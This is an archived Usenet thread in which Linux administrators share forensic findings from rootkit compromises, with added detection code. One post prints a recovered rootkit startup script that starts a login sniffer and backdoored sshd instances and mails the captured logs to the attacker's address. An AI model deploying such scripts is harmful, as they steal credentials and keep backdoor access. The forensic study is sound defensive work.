
looks like a worm to me.


Fredrik Bergström

Dec 20, 2001, 8:38:38 AM
Hello.

Some days ago, when I logged into one of my servers just to make some
small adjustments to a database, I found to my surprise that I could
not log in as root.

Strange, I thought, and called my friend who also has root access, but
he had not changed the root password.

A cold feeling swept down my back, and lots of C code scrolled by my
eyes. This server was set up for reinstallation some weeks ago, but I
had not gotten around to doing that. And it was a standard Slackware 7
installation with about 11 months of playing around with different
server software.

I ran a 'ps ax' but found nothing special. Or wait a minute, the list
was quite short for this machine; usually there are lots of processes going.
I went into /etc and after running "ls -ltr" (large, time, reverse) I
found that the files host, ftpaccess, ftpusers, shadow, inetd.conf were
changed on the same date and time. A file rc.d/rc.sysinit was also
added.

Since I was not root, I could not find anything more because all those
files were root.root. I waited some hours, and then I got cold feet.
I took the bus to the server room where the server is located, and went
'linux init=/bin/bash rw' on lilo's ass. A 'passwd' and 'sync' later and
I had a new root password.

Okay, looking around the system now I found that the commands ps, ls,
netstat, named, inetd, crond and a couple more were modified.

With the ps out of order I ran a 'cat /proc/*/stat' to see what
processes the machine was running. The commands 'snif' and 'ras2xm'
looked a bit interesting, and so I hurried to shut them down.

Back to the /etc/rc.d/rc.sysinit file: this file did not have the +x
flag set, and therefore Slackware did not run it on boot.
Good thing; this file contained one row, '/usr/bin/sourcemask'.

# cat /usr/bin/sourcemask
cd /usr/man/man1/".. "/.dir
./snif >chipsul &
/usr/bin/ras2xm -p 5139 -q

The sourcemask script starts the sniffer and the other one (possible
scanning tool?). I could not find any info anywhere about those
programs or their uses, and I dare not run them outside a
controlled environment.

To continue, now I had found all the stuff. Or so I thought. The
/usr/man/man1/".. "/.dir did contain tools to backdoor and
buffer-overflow sshd, bind and wuftpd servers and other hacking stuff.

I searched a bit on the net, and found a nice thought about running
'find / -nouser -o -nogroup' to find suspicious files on the server.
And off it went, and it found a couple of files and one directory in
/dev.

/dev/ttyp/ contained two directories, '.backup' and 'other'. .backup
had my old versions of ps, ls, inetd, inetd.conf, named and netstat. And the
'other' directory contained two scripts that seemed to configure the
appearance of the hacked ls, ps and netstat commands.

The fun in this was that /dev also contained some other files with
some fun information inside:

-----------------------------------
server:/dev# cat hdbp
2 sh
2 in.telnetd
3 rpc.rusers
3 mdump
3 chgrp
3 cron

server:/dev# cat hdaq
3 45050
3 31083

server:/dev# cat hdap
ttyp
rpc.rusers
hdaq
hdbp
hdap
lispmtopgm.2.gz
ldapdelete.2.gz
mdump

server:/dev# cat xmx
3 in.rexedcs
3 defauths dcs
3 defauths
3 rdcmound
3 rdcbac
3 w
3 s
3 psy
3 bot
3 scan
3 wus
3 klog
3 create
3 crush
3 snif
3 ras2xm
3 sourcemask

server:/dev# cat xdta
1 194.102.123.240
1 194.102.123.241
1 194.102.123.239
1 194.102.123.238
1 194.102.123.237
1 hobbiton.org
2 hobbiton.org
3 59311
3 59388
3 31471
3 51211
3 51212
3 51213
3 51214
4 6660
4 6666
4 6667
4 6668
4 6669
4 7000
4 31337
4 5555
4 31336

server:/dev#
----------------------------

The IPs 194.102.123.237-241 belong to a Computer Club (Internet Cafe-like) in
Timisoara, Romania.


Another fun detail was that with the hacker tools came two core-dump
files containing the ENV of the computers they were run on.

i686 ./scan 148 111 243 USERNAME=root ENV=/root/.bashrc HISTSIZE=1000
HOSTNAME=pirates.crsc.k12.ar.us LOGNAME=root HISTFILESIZE=1000
SSH_TTY=/dev/pts/0 MAIL=/var/spool/mail/root TERM=xterm HOSTTYPE=i386
PATH=/usr/bin:/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin HOME=/root
INPUTRC=/etc/inputrc SHELL=/bin/bash USER=root
SSH_CLIENT=194.102.224.92 1380 5139 OSTYPE=Linux SHLVL=2 _=./scan

i686 ./ben 128.97.6.184 LESSOPEN=|/usr/bin/lesspipe.sh %s
USERNAME=root ENV=/root/.bashrc HISTSIZE=1000 HOSTNAME=jun-zhi.com.tw
LOGNAME=root SSH_TTY=/dev/pts/4 MAIL=/var/spool/mail/root TERM=xterm
HOSTTYPE=i386
PATH=/usr/kerberos/bin:/usr/bin:/bin:/usr/bin:/usr/X11R6/bin:/root/bin
KDEDIR=/usr HOME=/root INPUTRC=/etc/inputrc SHELL=/bin/bash USER=root
QTDIR=/usr/lib/qt-2.1.0 LANG=en_US SSH_CLIENT=194.102.123.231 1189 3
OSTYPE=Linux _=./ben SHLVL=2

The IP 194.102.224.92 is located somewhere in BOTOSANI, Romania.

Summary:

Okay. I don't have a chance of framing someone for this. And I don't
know if I want to. I have had some fun days playing and searching all
over the net for clues. And I thought that it would be fun to write a
(long) posting to this newsgroup about it.


I would love some input from you all about this; I could not find any
info about the files. I found some old usenet postings in Japanese
about the file ras2xm but that's all. Is this a worm or a hacker?

Regards, Fredrik Bergström.
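The comparison the post does by hand, reading /proc/*/stat because ps had been replaced, written out as an added example (not part of the original post). The /proc lines and the trojaned "ps ax" output below are constructed for the illustration; the process names snif and ras2xm are the ones from the post.

```python
import os

# Constructed sample: what 'cat /proc/*/stat' showed, one line per process.
PROC_STAT_LINES = [
    "1 (init) S 0 1 1 0 -1 4194560 1234 0 0 0 2 3 0 0 9 0 0 0 5",
    "812 (crond) S 1 812 812 0 -1 4194560 200 0 0 0 0 0 0 0 9 0 0 0 50",
    "1337 (snif) S 1 1337 1337 0 -1 4194560 90 0 0 0 0 0 0 0 9 0 0 0 800",
    "1338 (ras2xm) S 1 1338 1338 0 -1 4194560 90 0 0 0 0 0 0 0 9 0 0 0 801",
]
# Constructed sample: output of the trojaned 'ps ax', which omits snif and ras2xm.
PS_AX_OUTPUT = """  PID TTY      STAT   TIME COMMAND
    1 ?        S      0:04 init
  812 ?        S      0:00 crond
"""

def parse_proc_stat(line):
    # /proc/<pid>/stat is "pid (comm) state ...". comm may contain spaces,
    # so take everything between the first '(' and the last ')'.
    pid, rest = line.split(" ", 1)
    return int(pid), rest[1:rest.rfind(")")]

def parse_ps_ax(text):
    # {pid: command} from 'ps ax' output; the first line is the header.
    visible = {}
    for row in text.splitlines()[1:]:
        fields = row.split(None, 4)
        if len(fields) == 5 and fields[0].isdigit():
            visible[int(fields[0])] = fields[4]
    return visible

def hidden_processes(proc_lines, ps_text):
    """Return {pid: comm} for processes present in /proc but absent from ps."""
    visible = parse_ps_ax(ps_text)
    return {pid: comm for pid, comm in map(parse_proc_stat, proc_lines)
            if pid not in visible}

def read_live_proc_stat():
    # Read /proc/<pid>/stat directly, bypassing a replaced ps binary. A kernel
    # rootkit could still hide entries from /proc; this only covers the
    # trojaned-userland case described in the thread.
    lines = []
    for entry in os.listdir("/proc"):
        if entry.isdigit():
            try:
                with open(f"/proc/{entry}/stat") as f:
                    lines.append(f.read().strip())
            except OSError:
                pass  # process exited between listdir and open
    return lines
```

On a live Linux box, hidden_processes(read_live_proc_stat(), subprocess.run(["ps", "ax"], capture_output=True, text=True).stdout) runs the same comparison; anything it returns deserves the treatment the post gives snif and ras2xm.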

Kasper Dupont

Dec 20, 2001, 9:37:05 AM
"Fredrik Bergström" wrote:
>
[snip]

> Is this a worm or a hacker?

I think this sounds like a cracker.

If you want to verify what it really is you should find out
what the new daemons do. If it is a worm they will probably
be trying to attack other computers. In either case they
might also create some backdoor to your system, so don't
connect it to the internet before you have cleaned the system,
and don't connect it with any other computer of any
importance.

--
Kasper Dupont

Luke Vogel

Dec 20, 2001, 5:36:52 PM
"Fredrik Bergström" wrote:

>Is this a worm or a hacker?

> Regards, Fredrik Bergström.

Nice bit of forensics there Fredrik ... I'd say it was a manual hacker
.. none of the files and locations that you described were consistent
with worms that I am familiar with.

If you wanted a bit more info on the files and what they do, you could
always run "strings" over them. This often gives a few clues as to the
purpose of the file.

Other than that, when you re-install, make sure you do the job properly,
including hardening and firewalling the box ...
--
Regards
Luke
------
Q: What does FAQ stand for?
A: We are Frequently Asked this Question, and we have no idea.
------
C.O.L.S FAQ - http://www.linuxsecurity.com/docs/colsfaq.html
------
PLEASE NOTE: Spamgard (tm) installed.
mailto:lukeN...@bell-bird.com.au (remove NOSPAM ... obviously:)
------

Michael Erskine

Dec 20, 2001, 7:23:44 PM
fredrik....@cetevo.com (Fredrik Bergström) wrote in message news:<3c21d67b...@news.vegasys.net>...
> Hello.

It may be a worm alright but it is most certainly a human one...

I *scanned* but did not read in detail your comments.

> server:/dev# cat xdta
> 1 194.102.123.240
> 1 194.102.123.241
> 1 194.102.123.239
> 1 194.102.123.238
> 1 194.102.123.237
> 1 hobbiton.org
> 2 hobbiton.org
> 3 59311
> 3 59388
> 3 31471
> 3 51211
> 3 51212
> 3 51213
> 3 51214
> 4 6660
> 4 6666
> 4 6667
> 4 6668
> 4 6669
> 4 7000
> 4 31337
> 4 5555
> 4 31336

The above will help you to start the process of *telephoning*
sysadmins and reporting the extent of *their* compromise. Interesting
list of ports.

> Okay. I don't have a chance framing someone for this. And I don't
> know if I want to. I have had some fun days playing and searching all
> over the net for clues. And thought that I would be fun to write a
> (long) posting to this newsgroup about it.

When you discover one of these, if you *really* want to go after the
person who done it... Drop a sniffer beside the host and then reboot
it. He'll come in to see what happened. All you will get is a line
on another compromised host but you (with the help of another
concerned admin) can leverage that into taking from the cracker, what
he took from you... your privacy.

Mind you that his *sniffer dump* has a bunch of information in it
about his connections to your host, unless the sniffer is set to
ignore the IP's he is using. Possible given the above, but unlikely in
view of the fact he changed the root password. You *really* should
contact the admin(s) at the IP's you have to help to clean up
things...

This is a cracker beyond any doubt at all. One that doesn't mind
giving away his hand by changing the root password is not
particularly adept. From the list of ports, he is likely scanning for
compromised winderz boxes.

Reinstall. Keep up with your patches.

-m-

Adam Ruth

Dec 30, 2001, 7:18:26 PM
I had a system, too, that was hit by a variant of this (on or about
Dec 26). Many of the files you listed were present on my system. I
was able to clean everything, but if you would like any information I
would be happy to share.

Adam Ruth

fredrik....@cetevo.com (Fredrik Bergström) wrote in message news:<3c21d67b...@news.vegasys.net>...

Luke Vogel

Dec 30, 2001, 9:39:59 PM
Adam Ruth wrote:
>
> I was able to clean everything,
----------------------^^^^^^^^^^

How do you know you got everything?

Alexander Loose

Jan 18, 2002, 11:57:27 AM
Hi,
I read your article about what you found out about the worm. I
had a very similar attack on 2 of my systems. I hope I'll find out
some more information on how this all works. Therefore I have a
question. Do you use the dyndns.org service on your machine? Or do
you connect your box through an uplink to the German Telekom or
T-Online?


fredrik....@cetevo.com (Fredrik Bergström) wrote in message news:<3c21d67b...@news.vegasys.net>...

> I would love some input from you all about this, I could not find any


> info about the files. I found some old usenet postings on Japanese
> about the file ras2xm but thats all. Is this a worm or a hacker?

I think it's a worm root-kit that many script kiddies used to create
their own trojan horse or worm to "hack" a unix or unix-like system.

> Regards, Fredrik Bergström.

with best regards, Alex Loose

Fredrik Bergström

Jan 21, 2002, 2:06:14 AM
Hello Alexander,

When did you have these attacks? Recently?

I would like some of the files with IP numbers so that I could dig a
bit deeper, send them in a private mail to me if you want to share
them.

Nope, I don't use any dyndns service or the like, and I have my uplink
through a Swedish company (where I work).

Are you suspicious of dyndns or t-online?

The attack that I had seems to have originated through an old sshd,
and there were capabilities in the rootkit to use wuftpd also.

Regards, Fredrik.

a...@loonet.de (Alexander Loose) wrote in message news:<88ebcd22.0201...@posting.google.com>...

Michael Chan

Feb 2, 2002, 7:55:20 AM
My system was hacked with the same program yesterday; the following
script was found:
#!/bin/sh
# Begin #
cd /usr/man/man1/".. "
./asus >chipsul &
/usr/sbin/initdl -p 45111 -q -f /etc/r.konfig>/dev/null
/usr/bin/initdl -p 45111 -q -f /etc/r.konfig>/dev/null
killall -HUP sshd1
/usr/local/sbin/sshd -p 22
/usr/sbin/sshd -p 22
# Log #
cd /usr/man/man1/".. "
./see chipsul >> log.txt
cat /var/run/.sn.so >> log.txt
cat log.txt | mail -s "Log" l...@arad-online.org
rm -rf log.txt
# End #
# Almost #
# http://arad-online.org/ #

This binary "./asus >chipsul &" was snooping every login and password
of the system and connecting back to an IP
12-230-106-13.client.attbi.com (12.230.106.13).

I am sure this guy hacked into my system through wu-ftpd, as I noticed its
existence after he removed my /etc/ftpaccess file.

As in other hacks, the programs "ps, ls, tcpd, sshd" were modified and a list
of programs were ported to the directory /usr/man/man1/".. ".

Anyone who would like to discuss this kind of hack can contact me for more
details, as I found this guy ported many programs onto my server.

Regards,
Michael

fredrik....@cetevo.com (Fredrik Bergström) wrote in message news:<c0dbdad.02012...@posting.google.com>...
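An added example, not from this thread, that hunts for the two filesystem oddities both this post and the first one describe: a directory whose name is only dots and spaces (the ".. " under /usr/man/man1) and plain files dropped into /dev (hdbp, hdaq, hdap, xmx, xdta in the first post). It builds a constructed temporary tree to run against; on a real box you would point suspicious_paths at "/".

```python
import os
import re
import stat
import tempfile

# Directory names made only of dots and whitespace, like the ".. " under
# /usr/man/man1 in this thread, look like "." or ".." in a casual listing and
# are never created by ordinary packages.
DOTS_AND_SPACES = re.compile(r"^[.\s]+$")

def suspicious_paths(root):
    """Return root-relative paths of (a) directories whose name is only dots
    and whitespace and (b) regular files below <root>/dev, where only device
    nodes, symlinks and a few directories belong (the thread's hdbp, hdaq,
    hdap, xmx and xdta were plain files dropped there)."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        for name in dirnames:
            if DOTS_AND_SPACES.match(name):
                hits.append(os.path.normpath(os.path.join(rel, name)))
        if rel == "dev" or rel.startswith("dev" + os.sep):
            for name in filenames:
                if stat.S_ISREG(os.lstat(os.path.join(dirpath, name)).st_mode):
                    hits.append(os.path.normpath(os.path.join(rel, name)))
    return sorted(hits)

def build_constructed_tree():
    """Constructed sample tree imitating the compromised layout in this thread."""
    base = tempfile.mkdtemp(prefix="rkcheck_")
    os.makedirs(os.path.join(base, "usr", "man", "man1", ".. ", ".dir"))
    os.makedirs(os.path.join(base, "dev", "pts"))            # legitimate directory
    with open(os.path.join(base, "dev", "hdbp"), "w") as f:  # rootkit config file
        f.write("2 sh\n3 cron\n")
    with open(os.path.join(base, "usr", "man", "man1", "ls.1.gz"), "w") as f:
        f.write("ordinary man page\n")                        # must not be flagged
    return base

if __name__ == "__main__":
    print(suspicious_paths(build_constructed_tree()))
```

Older distributions keep a legitimate script at /dev/MAKEDEV, so allow-list known exceptions before treating every hit as hostile, and run the check from a clean boot medium since the box's own ls and find may be replaced.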

Simon Green

Feb 2, 2002, 10:13:01 PM
Michael,

Not to put too fine a point on it--

Rather than worry too much about the details of the hack, you should just
patch wu-ftpd, or use a different one instead. Getting hacked twice exactly
the same way is a good hint that you have a vulnerable version.

Oh, and don't try to fix the system, reformat and install from scratch.

Simon
